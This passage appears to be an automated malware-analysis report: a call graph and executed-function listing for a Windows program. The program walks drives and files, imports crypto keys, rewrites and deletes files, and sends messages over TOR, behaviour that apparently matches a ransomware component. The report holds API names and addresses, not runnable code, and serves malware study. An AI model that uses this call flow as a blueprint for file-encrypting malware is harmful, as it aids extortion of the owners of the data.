5040->5055 5041->5033 5041->5038 5042 412515 5042->5015 5043 41257d 5046 412637 5043->5046 5052 411660 8 API calls 5043->5052 5044 41253f 5045 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5044->5045 5048 412547 5045->5048 5046->5015 5047 4125da 5053 4125df wsprintfA 5047->5053 5048->5015 5049 412671 wsprintfA 5054 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5049->5054 5050 412559 5057 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5050->5057 5051->5042 5051->5044 5051->5050 5058 4126ad 5052->5058 5056 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5053->5056 5059 41260a CreateFileA 5054->5059 5055->5043 5055->5047 5055->5049 5055->5053 5056->5059 5060 412566 5057->5060 5061 4126ba #823 5058->5061 5065 4126cd 5058->5065 5059->5043 5060->5015 5061->5065 5063 411810 SetFilePointer SetFilePointer ReadFile 5063->5065 5064 412728 5067 412776 5064->5067 5068 41276f CloseHandle 5064->5068 5065->5063 5065->5064 5066 412704 WriteFile 5065->5066 5069 412746 SetFileTime 5065->5069 5066->5065 5070 412732 5066->5070 5071 411ac0 free free 5067->5071 5068->5067 5069->5064 5070->5064 5072 41277e 5071->5072 5072->5015 5074 4127a9 5073->5074 5077 4127b1 5073->5077 5075 411ac0 2 API calls 5074->5075 5075->5077 5078 4127c7 5077->5078 5079 410f70 5077->5079 5078->4887 5078->4889 5078->4890 5080 410f79 5079->5080 5081 410f80 5079->5081 5080->5078 5082 411ac0 free free 5081->5082 5084 410f8d 5081->5084 5082->5084 5083 4109c0 CloseHandle #825 5085 410f98 free 5083->5085 5084->5083 5085->5078 5088 40d8ec 5086->5088 5087 40daad closesocket 5089 40baa8 5087->5089 5088->5087 5088->5089 5089->4742 5091 40c9f6 #823 5090->5091 5093 40ca40 5091->5093 5094 40ca87 #825 5093->5094 5095 40ca81 5093->5095 5094->5095 5095->4803 5097 40cb00 5096->5097 5108 40cbf3 5096->5108 5098 40cb26 5097->5098 5104 40cb90 5097->5104 5100 40cb31 5098->5100 5101 40cb2c ?_Xran@std@ 5098->5101 5099 40cbe9 5102 40cc60 5 API calls 5099->5102 5115 40cd80 5100->5115 5101->5100 5102->5108 5104->5099 5106 40cbaa 5104->5106 5105 40cb38 5107 40cb47 memmove 5105->5107 5114 40cb6a 5105->5114 5109 40c7b0 #825 5106->5109 5132 40cc60 5107->5132 5108->4812 5112 40cbb3 5109->5112 5111 40cd80 4 API calls 5113 40cb7d 5111->5113 5112->4812 5113->4812 5114->5111 5116 40cd93 5115->5116 5128 40ce27 5115->5128 5117 40cdd0 5116->5117 5118 40cdc9 ?_Xlen@std@ 5116->5118 5116->5128 5119 40cdf8 5117->5119 5121 40cde2 5117->5121 5118->5117 5120 40cdfc 5119->5120 5122 40ce0a 5119->5122 5123 40c7b0 #825 5120->5123 5124 40ce1f 5121->5124 5125 40cde6 5121->5125 5126 40c7b0 #825 5122->5126 5122->5128 5127 40ce05 5123->5127 5130 40c9c0 2 API calls 5124->5130 5129 40c7b0 #825 5125->5129 5126->5124 5127->5105 5128->5105 5131 40cdf3 5129->5131 5130->5128 5131->5105 5133 40cc6e ?_Xlen@std@ 5132->5133 5134 40cc73 5132->5134 5133->5134 5135 40cd04 5134->5135 5137 40cc88 5134->5137 5140 40ccae 5134->5140 5135->5137 5143 40cd08 5135->5143 5136 40ccc4 5136->5114 5138 40cc90 5137->5138 5142 40c9c0 2 API calls 5137->5142 5138->5114 5139 40cd4c 5145 40c9c0 2 API calls 5139->5145 5140->5136 5141 40ccd9 #825 5140->5141 5141->5136 5142->5138 5143->5138 5143->5139 5144 40cd43 #825 5143->5144 5146 40cd26 5143->5146 5144->5139 5147 40cd5d 5145->5147 5148 40c9c0 2 API calls 5146->5148 5147->5114 5149 40cd3b 5148->5149 5149->5114 5150->4776 5151->4776 5153 412af5 5152->5153 5154 412ac8 free 5152->5154 5153->4733 5154->5153 5733 406ef0 5734 406f03 #823 5733->5734 5735 406f6a 5733->5735 5734->5735 5737 406f25 SendMessageA ShellExecuteA #825 5734->5737 5737->5735 5176 40dad0 5177 40dadf setsockopt send shutdown closesocket 5176->5177 5178 40db33 5176->5178 5177->5178 5929 404150 5934 404170 #2414 #800 #800 #795 5929->5934 5931 404158 5932 40415f #825 5931->5932 5933 404168 5931->5933 5932->5933 5934->5931 5738 404410 SetCursor 5935 407650 5936 40765e 5935->5936 5940 407670 5935->5940 5937 4076a0 20 API calls 5936->5937 5939 407665 #2379 5937->5939 5938 407690 #2379 5940->5938 5941 40b620 9 API calls 5940->5941 5942 40768d 5941->5942 5942->5938 6095 401f10 6100 401f30 6095->6100 6098 401f28 6099 401f1f #825 6099->6098 6107 401fa0 6100->6107 6102 401f60 6116 404690 DeleteCriticalSection 6102->6116 6104 401f7a 6117 404690 DeleteCriticalSection 6104->6117 6106 401f18 6106->6098 6106->6099 6108 404770 3 API calls 6107->6108 6109 401fac 6108->6109 6110 404770 3 API calls 6109->6110 6112 401fb4 6110->6112 6111 40200c 6111->6102 6112->6112 6113 401fe3 6112->6113 6114 401fd0 GlobalFree 6112->6114 6113->6111 6113->6113 6115 401ff9 GlobalFree 6113->6115 6114->6113 6115->6111 6116->6104 6117->6106 5739 4059f0 5740 4059f8 5739->5740 5741 405a08 5740->5741 5742 4059ff #825 5740->5742 5742->5741 6118 409a40 6122 409d40 6118->6122 6121 409ae7 #2414 #2414 6123 409a87 OffsetRect CreateRectRgn #1641 #5781 6122->6123 6123->6121 5743 408580 #609 5744 40858f #825 5743->5744 5745 408598 5743->5745 5744->5745 5943 404d90 #2370 #2289 6320 40dbd0 6321 40dbf0 free 6320->6321 6322 40dbd8 6321->6322 6323 40dbe8 6322->6323 6324 40dbdf #825 6322->6324 6324->6323 5746 4090f0 5747 409124 #540 #3874 5746->5747 5748 40971e 5746->5748 5749 409185 5747->5749 5752 40915e 5747->5752 5750 40918e #860 5749->5750 5751 40919c _ftol 5749->5751 5750->5751 5755 40917c 5751->5755 5752->5755 5756 40916e #860 5752->5756 5753 40970a #800 5753->5748 5754 4091d5 SendMessageA #2860 5757 409208 5754->5757 5755->5753 5755->5754 5756->5755 5772 409870 5757->5772 5759 409232 #5875 #6170 GetWindowOrgEx #540 #2818 5761 409329 GetObjectA 5759->5761 5762 40935b GetTextExtentPoint32A 5759->5762 5761->5762 5764 40938b GetViewportOrgEx 5762->5764 5765 409411 5764->5765 5766 409630 #800 5765->5766 5767 40965a #6170 5766->5767 5768 409662 5766->5768 5767->5768 5769 40967d #5875 5768->5769 5771 409685 #2414 #2414 5768->5771 5769->5771 5771->5753 5773 409880 #2414 5772->5773 5773->5759 5775 404050 #616 5776 40405f #825 5775->5776 5777 404068 5775->5777 5776->5777 5778 409c20 #3797 5779 409c36 5778->5779 5780 409c40 #6734 5778->5780 5781 409c5b SendMessageA 5780->5781 5782 409c78 5780->5782 5781->5782 5783 409ce4 5782->5783 5785 409caa 5782->5785 5784 409ce8 InvalidateRect 5783->5784 5786 409cf6 5783->5786 5784->5786 5787 409cc4 #4284 5785->5787 5788 409cd4 #4284 5785->5788 5787->5786 5788->5786 5789 4102d0 free 6325 40a0a0 6326 40a0a8 6325->6326 6327 40a0ab GrayStringA 6325->6327 6326->6327 6328 403810 WideCharToMultiByte 6331 403e60 SendMessageA #3998 SendMessageA 6328->6331 6330 403845 6331->6330 5790 404430 5791 40447b 5790->5791 5792 40443d _TrackMouseEvent #2379 5790->5792 5795 404489 5791->5795 5797 404530 5791->5797 5796 4044a1 SetCursor #2379 5795->5796 5798 404552 5797->5798 5799 4045c1 5797->5799 5798->5799 5800 404559 #289 #5789 GetTextExtentPoint32A #5789 #613 5798->5800 5799->5795 5800->5799 6332 409b70 #2379 6130 403180 6135 4031a0 #2414 #2414 #616 #693 #641 6130->6135 6132 403188 6133 40318f #825 6132->6133 6134 403198 6132->6134 6133->6134 6135->6132 5801 4085a0 #781 5802 4085af #825 5801->5802 5803 4085b8 5801->5803 5802->5803 5804 403f70 5809 403f90 #2414 5804->5809 5806 403f78 5807 403f88 5806->5807 5808 403f7f #825 5806->5808 5808->5807 5809->5806 5810 4059d0 #561 5944 408c20 5949 408b40 5944->5949 5946 408c28 5947 408c2f #825 5946->5947 5948 408c38 5946->5948 5947->5948 5950 408bd0 5949->5950 5953 408b78 BitBlt 5949->5953 5951 408bd6 #2414 #640 5950->5951 5951->5946 5954 408bb5 #5785 5953->5954 5955 408bc1 #5785 5953->5955 5954->5951 5955->5951 6136 40d630 6141 40d650 6136->6141 6138 40d638 6139 40d63f #825 6138->6139 6140 40d648 6138->6140 6139->6140 6142 40dad0 4 API calls 6141->6142 6143 40d680 6142->6143 6143->6138 5811 404070 #693 5812 40407f #825 5811->5812 5813 404088 5811->5813 5812->5813 5814 403f00 5819 403f20 #2414 5814->5819 5816 403f08 5817 403f18 5816->5817 5818 403f0f #825 5816->5818 5818->5817 5819->5816 6144 40cfe0 6151 40d4c0 6144->6151 6146 40cffb 6147 40d4c0 4 API calls 6146->6147 6150 40d05e 6146->6150 6148 40d031 6147->6148 6149 40d4c0 4 API calls 6148->6149 6148->6150 6149->6150 6152 40d4d0 6151->6152 6153 40d4d9 6151->6153 6152->6146 6154 40d4e4 6153->6154 6155 40d4ee time 6153->6155 6154->6146 6156 40d575 6155->6156 6160 40d50a 6155->6160 6157 40d58a 6156->6157 6158 40d2b0 memmove 6156->6158 6157->6146 6158->6157 6159 40d569 time 6159->6156 6159->6160 6160->6156 6160->6159 6161 40d551 Sleep 6160->6161 6161->6160 4642 4102b0 calloc 5956 409920 5961 4098c0 5956->5961 5959 40992f #825 5960 409938 5959->5960 5962 4098fb 5961->5962 5963 4098f2 #5875 5961->5963 5962->5959 5962->5960 5963->5962 5964 4032c0 6 API calls 5965 403334 SendMessageA #3092 5964->5965 5967 40335c SendMessageA #3092 5965->5967 5969 40337b SendMessageA #3092 5967->5969 5971 4033a0 SendMessageA 5969->5971 5972 40339d 5969->5972 5975 403cb0 FindFirstFileA 5971->5975 5972->5971 5974 4033b2 SendMessageA #3996 SendMessageA 5976 403cd9 5975->5976 5977 403ce3 5975->5977 5976->5974 5978 403e1f FindNextFileA 5977->5978 5980 403d14 sscanf 5977->5980 5978->5977 5979 403e3a FindClose 5978->5979 5979->5974 5980->5978 5981 403d38 fopen 5980->5981 5981->5978 5982 403d5c fread 5981->5982 5983 403e15 fclose 5982->5983 5984 403d7b 5982->5984 5983->5978 5984->5983 5985 403d8f sprintf 5984->5985 5986 403dd4 SendMessageA #823 SendMessageA 5984->5986 5988 401c30 inet_ntoa 5984->5988 5985->5986 5986->5983 5988->5984 6333 4086e0 #470 GetClientRect SendMessageA #6734 #323 6334 408765 6333->6334 6335 408838 6334->6335 6336 4087bd CreateCompatibleDC #1640 6334->6336 6337 408885 #2754 6335->6337 6340 408869 FillRect 6335->6340 6365 409e70 CreateCompatibleBitmap #1641 6336->6365 6339 408897 #2381 6337->6339 6342 4088b4 6339->6342 6346 408a7d 6339->6346 6340->6339 6341 408809 6366 409f10 6341->6366 6345 4088be #3797 6342->6345 6342->6346 6348 408901 _ftol 6345->6348 6349 409f80 BitBlt 6346->6349 6351 408a5e 6346->6351 6347 408817 #6194 6347->6335 6354 40895e _ftol 6348->6354 6359 40897e 6348->6359 6352 408abe 6349->6352 6372 409e20 #2414 6351->6372 6355 408ad5 #5785 6352->6355 6356 408ac6 #5785 6352->6356 6354->6359 6355->6351 6356->6351 6357 408afe #640 #755 6358 4089ca 6358->6351 6369 409f80 6358->6369 6359->6358 6360 4089b8 FillRect 6359->6360 6361 4089a7 FillRect 6359->6361 6360->6358 6361->6358 6363 408a50 6364 409f10 2 API calls 6363->6364 6364->6351 6365->6341 6367 409f18 #5785 6366->6367 6368 409f25 #5785 6366->6368 6367->6347 6368->6347 6370 409f8b BitBlt 6369->6370 6371 409f88 6369->6371 6370->6363 6371->6370 6372->6357 6376 407cb0 6379 4030e0 #324 #567 #567 6376->6379 6378 407cd6 6 API calls 6379->6378 6373 404fe0 #6334 6374 404ffb 6373->6374 6375 404ff4 #4853 6373->6375 6375->6374 6380 4034a0 6 API calls 5820 404cd0 5825 404cf0 #2414 #2414 #800 #641 5820->5825 5822 404cd8 5823 404cdf #825 5822->5823 5824 404ce8 5822->5824 5823->5824 5825->5822 6381 40db80 recv 6382 409f40 PtVisible 6162 404670 6167 404690 DeleteCriticalSection 6162->6167 6164 404678 6165 404688 6164->6165 6166 40467f #825 6164->6166 6166->6165 6167->6164 6168 404aa3 6169 404ab1 6168->6169 6170 404aaa GlobalFree 6168->6170 6171 404ac0 6169->6171 6172 404ab9 CloseHandle 6169->6172 6170->6169 6172->6171 6173 4068c0 #4837 5989 408c40 5990 408d5c 5989->5990 5992 408c97 5989->5992 5991 408c9d _ftol _ftol 5991->5992 5992->5990 5992->5991 6383 403860 SendMessageA 6384 403883 #1200 6383->6384 6385 403892 SendMessageA 6383->6385 6386 4038a5 SendMessageA CreateThread 6385->6386 6387 4038d1 6385->6387 6386->6387 6388 4038e0 6386->6388 6391 4038f0 6388->6391 6390 4038e9 6410 403eb0 6 API calls 6391->6410 6393 403916 SendMessageA 6394 4039e1 6393->6394 6395 403937 SendMessageA 6393->6395 6450 403eb0 6 API calls 6394->6450 6397 403958 6395->6397 6398 403951 6395->6398 6428 401e90 6397->6428 6411 403af0 fopen 6398->6411 6399 4039ea CloseHandle 6399->6390 6402 403961 sprintf 6433 402020 6402->6433 6404 403998 6405 40399c 6404->6405 6442 403a20 6404->6442 6407 4039cd 6405->6407 6409 4039c8 #1200 6405->6409 6408 401f30 6 API calls 6407->6408 6408->6394 6409->6407 6410->6393 6412 403b28 6411->6412 6413 403b41 6411->6413 6412->6397 6414 401e90 InitializeCriticalSection 6413->6414 6415 403b4d 6414->6415 6416 402020 14 API calls 6415->6416 6417 403b67 6416->6417 6418 403b6b 6417->6418 6421 403b9b 6417->6421 6419 401f30 6 API calls 6418->6419 6423 403b82 6419->6423 6420 403c61 fclose 6424 401f30 6 API calls 6420->6424 6421->6420 6422 403bb2 fgets 6421->6422 6425 403c5f 6421->6425 6451 402650 MultiByteToWideChar 6421->6451 6422->6421 6422->6425 6423->6397 6426 403c8f 6424->6426 6425->6420 6426->6397 6543 404640 InitializeCriticalSection 6428->6543 6430 401eb6 6544 404640 InitializeCriticalSection 6430->6544 6432 401ec4 6432->6402 6545 4046f0 6433->6545 6435 402031 6436 402035 6435->6436 6437 402048 GlobalAlloc 6435->6437 6440 4046f0 12 API calls 6435->6440 6436->6404 6438 402061 6437->6438 6439 402066 GlobalAlloc 6437->6439 6438->6404 6441 402079 6439->6441 6440->6437 6441->6404 6443 403a32 GetLogicalDrives 6442->6443 6444 403adc 6442->6444 6445 403a48 6443->6445 6444->6405 6446 403a53 GetDriveTypeW 6445->6446 6447 403ace 6445->6447 6562 4026b0 6445->6562 6446->6445 6448 403a81 GetDiskFreeSpaceExW 6446->6448 6447->6405 6448->6445 6450->6399 6454 402560 wcscpy wcsrchr 6451->6454 6453 40269a 6453->6421 6455 4025c9 wcscat 6454->6455 6456 402599 _wcsicmp 6454->6456 6458 4025bd 6455->6458 6457 4025ae _wcsicmp 6456->6457 6456->6458 6457->6455 6457->6458 6467 4020a0 CreateFileW 6458->6467 6460 4025eb 6461 4025ef DeleteFileW 6460->6461 6462 402629 DeleteFileW 6460->6462 6463 402634 6461->6463 6464 4025fa 6461->6464 6462->6463 6463->6453 6465 4025fe MoveFileW 6464->6465 6466 402617 6464->6466 6465->6453 6466->6453 6468 402143 GetFileTime ReadFile 6467->6468 6470 402139 _local_unwind2 6467->6470 6469 40217c 6468->6469 6468->6470 6469->6470 6472 402196 ReadFile 6469->6472 6470->6460 6472->6470 6473 4021b3 6472->6473 6473->6470 6474 4021c3 ReadFile 6473->6474 6474->6470 6475 4021ea ReadFile 6474->6475 6475->6470 6476 402208 ReadFile 6475->6476 6476->6470 6477 402226 6476->6477 6478 402233 CloseHandle CreateFileW 6477->6478 6479 4022f9 CreateFileW 6477->6479 6478->6470 6481 402264 SetFilePointer ReadFile 6478->6481 6479->6470 6480 40232c 6479->6480 6500 404af0 6480->6500 6481->6470 6482 402297 6481->6482 6482->6470 6484 4022a4 SetFilePointer WriteFile 6482->6484 6484->6470 6486 4022ce 6484->6486 6485 40234d 6487 402372 6485->6487 6490 404af0 4 API calls 6485->6490 6486->6470 6489 4022db SetFilePointer SetEndOfFile 6486->6489 6487->6470 6505 40a150 6487->6505 6491 402497 SetFileTime 6489->6491 6490->6487 6492 4024bc CloseHandle MoveFileW 6491->6492 6494 4024e0 _local_unwind2 6491->6494 6492->6494 6493 402477 SetFilePointerEx SetEndOfFile 6493->6491 6494->6460 6496 4023e0 ReadFile 6496->6470 6497 4023a7 6496->6497 6497->6470 6497->6493 6497->6496 6512 40b3c0 6497->6512 6501 404b04 EnterCriticalSection CryptDecrypt 6500->6501 6502 404afc 6500->6502 6503 404b2d LeaveCriticalSection 6501->6503 6504 404b3b LeaveCriticalSection 6501->6504 6502->6485 6503->6485 6504->6485 6506 40a15e ??0exception@@QAE@ABQBD _CxxThrowException 6505->6506 6507 40a184 6505->6507 6506->6507 6508 40a1bd 6507->6508 6510 40a197 ??0exception@@QAE@ABQBD _CxxThrowException 6507->6510 6509 40a1f6 6508->6509 6511 40a1d0 ??0exception@@QAE@ABQBD _CxxThrowException 6508->6511 6509->6497 6510->6508 6511->6509 6513 40b3ee 6512->6513 6514 40b3d0 ??0exception@@QAE@ABQBD _CxxThrowException 6512->6514 6515 40b602 ??0exception@@QAE@ABQBD _CxxThrowException 6513->6515 6516 40b410 6513->6516 6514->6513 6517 402424 WriteFile 6516->6517 6521 40b4cf ??0exception@@QAE@ABQBD _CxxThrowException 6516->6521 6524 40b4ed 6516->6524 6525 40b0c0 6516->6525 6517->6470 6517->6497 6518 40b5ba 6518->6517 6520 40b0c0 4 API calls 6518->6520 6520->6518 6521->6524 6523 40b59c ??0exception@@QAE@ABQBD _CxxThrowException 6523->6518 6524->6517 6524->6518 6524->6523 6531 40adc0 6524->6531 6526 40b0d0 ??0exception@@QAE@ABQBD _CxxThrowException 6525->6526 6527 40b0ee 6525->6527 6526->6527 6530 40b114 6527->6530 6537 40a9d0 6527->6537 6530->6516 6532 40add0 ??0exception@@QAE@ABQBD _CxxThrowException 6531->6532 6533 40adee 6531->6533 6532->6533 6534 40ae14 6533->6534 6540 40a610 6533->6540 6534->6524 6538 40a9e1 ??0exception@@QAE@ABQBD _CxxThrowException 6537->6538 6539 40a9ff 6537->6539 6538->6539 6539->6516 6541 40a621 ??0exception@@QAE@ABQBD _CxxThrowException 6540->6541 6542 40a63f 6540->6542 6541->6542 6542->6524 6543->6430 6544->6432 6546 4046b0 CryptAcquireContextA 6545->6546 6547 4046f8 6546->6547 6548 4046fc 6547->6548 6549 404709 6547->6549 6552 404770 3 API calls 6548->6552 6550 404711 CryptImportKey 6549->6550 6551 40473e 6549->6551 6554 404760 6550->6554 6555 404731 6550->6555 6553 4049b0 7 API calls 6551->6553 6556 404703 6552->6556 6557 40474c 6553->6557 6554->6435 6558 404770 3 API calls 6555->6558 6556->6435 6557->6554 6560 404770 3 API calls 6557->6560 6559 404738 6558->6559 6559->6435 6561 40475a 6560->6561 6561->6435 6563 40c8f0 #823 6562->6563 6564 4026e4 6563->6564 6565 40c8f0 #823 6564->6565 6566 402706 swprintf FindFirstFileW 6565->6566 6567 40274d 6566->6567 6570 4027b4 6566->6570 6601 402e00 6567->6601 6569 40276a #825 6572 402e00 2 API calls 6569->6572 6571 4027d4 wcscmp 6570->6571 6574 40295d FindNextFileW 6570->6574 6575 402978 FindClose 6570->6575 6589 402856 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 6570->6589 6607 402af0 _wcsnicmp 6570->6607 6573 4027ee wcscmp 6571->6573 6571->6574 6577 4027a0 #825 6572->6577 6573->6574 6576 402808 swprintf GetFileAttributesW 6573->6576 6574->6570 6574->6575 6580 4029b9 6575->6580 6590 40298d 6575->6590 6576->6570 6578 4028b6 wcscmp 6576->6578 6579 402ace 6577->6579 6578->6574 6583 4028d0 wcscmp 6578->6583 6579->6445 6581 4029ef swprintf DeleteFileW swprintf DeleteFileW 6580->6581 6592 4026b0 84 API calls 6580->6592 6584 402a6a #825 6581->6584 6593 402a4f 6581->6593 6583->6574 6586 4028e6 wcscmp 6583->6586 6587 402aba #825 6584->6587 6595 402a94 6584->6595 6585 402560 59 API calls 6585->6590 6586->6574 6591 4028fc ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 6586->6591 6587->6579 6629 402da0 #823 6589->6629 6590->6580 6590->6585 6596 402da0 8 API calls 6591->6596 6592->6580 6597 402a66 6593->6597 6633 402e90 6593->6633 6595->6587 6599 402e90 2 API calls 6595->6599 6598 4028a3 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 6596->6598 6597->6584 6598->6574 6599->6595 6602 402e10 6601->6602 6603 402e7a 6601->6603 6604 402e4c #825 6602->6604 6606 402e40 #825 6602->6606 6603->6569 6604->6602 6605 402e6d 6604->6605 6605->6569 6606->6604 6608 402b1f 6607->6608 6609 402b12 wcsstr 6607->6609 6610 402b30 _wcsicmp 6608->6610 6611 402be9 _wcsicmp 6608->6611 6609->6608 6614 402b4d _wcsicmp 6610->6614 6615 402b42 6610->6615 6612 402c07 _wcsicmp 6611->6612 6613 402bfc 6611->6613 6616 402c16 6612->6616 6617 402c21 _wcsicmp 6612->6617 6613->6570 6618 402b5c 6614->6618 6619 402b67 _wcsicmp 6614->6619 6615->6570 6616->6570 6617->6570 6618->6570 6620 402b81 _wcsicmp 6619->6620 6621 402b76 6619->6621 6622 402b90 6620->6622 6623 402b9b _wcsicmp 6620->6623 6621->6570 6622->6570 6624 402bb5 wcsstr 6623->6624 6625 402baa 6623->6625 6626 402bc4 6624->6626 6627 402bcf wcsstr 6624->6627 6625->6570 6626->6570 6627->6611 6628 402bde 6627->6628 6628->6570 6630 402dbf 6629->6630 6638 402f10 6630->6638 6632 402de4 6632->6598 6634 402eb1 6633->6634 6635 402ed0 #825 6633->6635 6636 402ec4 #825 6634->6636 6637 402ebd 6634->6637 6635->6593 6636->6635 6637->6635 6639 402f40 6638->6639 6646 403044 6638->6646 6640 402f68 6639->6640 6645 402fdb 6639->6645 6642 402f74 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6640->6642 6643 402f6e ?_Xran@std@ 6640->6643 6641 403035 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 6641->6646 6644 402f85 6642->6644 6643->6642 6647 402fc0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6644->6647 6649 402fa1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 6644->6649 6645->6641 6648 402ff5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 6645->6648 6646->6632 6647->6632 6650 403006 6648->6650 6649->6647 6651 402fb7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 6649->6651 6650->6632 6651->6647 6174 407db0 6181 401000 #324 #567 6174->6181 6176 407dd7 time 6177 407dfe 6176->6177 6178 407e09 #2514 6176->6178 6177->6178 6179 407e34 #765 #641 6178->6179 6180 407e28 time 6178->6180 6180->6179 6181->6176 5832 405df0 5837 405d90 #654 #765 5832->5837 5834 405df8 5835 405dff #825 5834->5835 5836 405e08 5834->5836 5835->5836 5837->5834 5993 404dd0 6 API calls 5994 404e3b SendMessageA #3092 5993->5994 5996 404e60 SendMessageA #3092 5994->5996 5998 404e7f SendMessageA 5996->5998 5999 404e93 SendMessageA 5996->5999 6182 4035a0 SendMessageA 6183 4037e9 6182->6183 6184 4035e5 OpenClipboard 6182->6184 6184->6183 6185 4035f7 SendMessageA 6184->6185 6186 403681 GlobalAlloc 6185->6186 6187 40360f #3301 #924 #800 #800 SendMessageA 6185->6187 6188 40369b GlobalLock 6186->6188 6189 4037e3 CloseClipboard 6186->6189 6187->6186 6187->6187 6190 4036aa GlobalFree 6188->6190 6191 4036b6 SendMessageA 6188->6191 6189->6183 6190->6189 6192 4036d6 8 API calls 6191->6192 6193 4037c3 GlobalUnlock EmptyClipboard SetClipboardData 6191->6193 6195 4037bf 6192->6195 6193->6189 6195->6193 6652 409b20 6653 409b31 6652->6653 6654 409b33 #6140 6652->6654 6653->6654 6000 4130d4 ??1type_info@@UAE 6001 4130e3 #825 6000->6001 6002 4130ea 6000->6002 6001->6002 6655 40a0e0 Escape 6656 409f60 RectVisible 6657 404310 6658 40433a #470 #5789 #5875 #6172 6657->6658 6659 404333 6657->6659 6661 40438a #5789 #755 6658->6661 6660 4044c0 7 API calls 6659->6660 6660->6658 6196 409a20 6201 4099c0 6196->6201 6199 409a38 6200 409a2f #825 6200->6199 6202 409a03 6201->6202 6203 4099f3 #6170 6201->6203 6202->6199 6202->6200 6203->6202 6003 401091 6008 4010c0 #765 #641 6003->6008 6005 4010a8 6006 4010af #825 6005->6006 6007 4010b8 6005->6007 6006->6007 6008->6005 6204 4068e0 6205 4068ef 6204->6205 6206 40691a #5280 6205->6206 6207 4068fc 6205->6207 6662 402d30 6663 402d73 #825 6662->6663 6664 402d3f 6662->6664 6665 402d40 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N #825 6664->6665 6665->6665 6666 402d72 6665->6666 6666->6663 5838 40d880 5841 40d0a0 time srand rand 5838->5841 5840 40d88f 5842 40d0d3 rand 5841->5842 5843 40d0e1 5841->5843 5842->5842 5842->5843 5843->5840 5844 408d70 5845 408e09 GetDeviceCaps 5844->5845 5847 408eb0 5845->5847 5851 408ed8 5845->5851 5848 408eba GetDeviceCaps GetDeviceCaps 5847->5848 5847->5851 5848->5851 5849 4090b6 #2414 5850 408f51 _ftol _ftol 5850->5851 5851->5849 5851->5850 5852 408fca _ftol _ftol _ftol 5851->5852 5854 409048 FillRect #2414 5851->5854 5855 409083 #2754 5851->5855 5852->5851 5853 409024 CreateSolidBrush #1641 5852->5853 5853->5851 5854->5851 5855->5851 6667 405230 6670 40525a 6667->6670 6680 405369 6667->6680 6668 405285 6671 40528f #4277 #923 #858 #800 #800 6668->6671 6672 4052ee 7 API calls 6668->6672 6669 405552 InvalidateRect 6674 405560 6669->6674 6670->6668 6679 405277 #940 6670->6679 6671->6669 6672->6669 6673 40539e 6675 405430 6673->6675 6676 4053aa 7 API calls 6673->6676 6677 405435 7 API calls 6675->6677 6678 4054b4 6675->6678 6676->6669 6677->6669 6682 4054b8 6678->6682 6684 405503 6678->6684 6679->6668 6679->6679 6680->6669 6680->6673 6681 405390 #940 6680->6681 6681->6673 6681->6681 6682->6669 6683 4054de #6778 #6648 6682->6683 6683->6683 6685 405501 6683->6685 6684->6669 6684->6674 6686 405529 #6778 #6648 6684->6686 6685->6669 6686->6669 6686->6686

    Executed Functions

    Function 004082C0, Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 181
    APIs
    • #4278.MFC42(000003E8,00000000,000003E8,?,?,76923ABC), ref: 0040830D
    • #858.MFC42 ref: 00408322
    • #800.MFC42 ref: 00408332
    • #1200.MFC42(Too short message!,00000000,00000000,?,?,76923ABC), ref: 00408354
    • #800.MFC42 ref: 0040836B
    • time.MSVCRT ref: 0040837F
    • #540.MFC42 ref: 004083C8
    • time.MSVCRT ref: 004083D6
    • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
    • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
    • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
    • #800.MFC42 ref: 00408440
    • time.MSVCRT ref: 0040844E
    • fopen.MSVCRT ref: 00408487
    • #800.MFC42 ref: 004084A8
    • fread.MSVCRT ref: 004084C2
    • fclose.MSVCRT ref: 004084C9
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
    • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
    • time.MSVCRT ref: 00408528
    • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
    • #800.MFC42 ref: 0040855B
    Strings
    • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
    • 00000000.res, xrefs: 00408480
    • Too short message!, xrefs: 0040834F
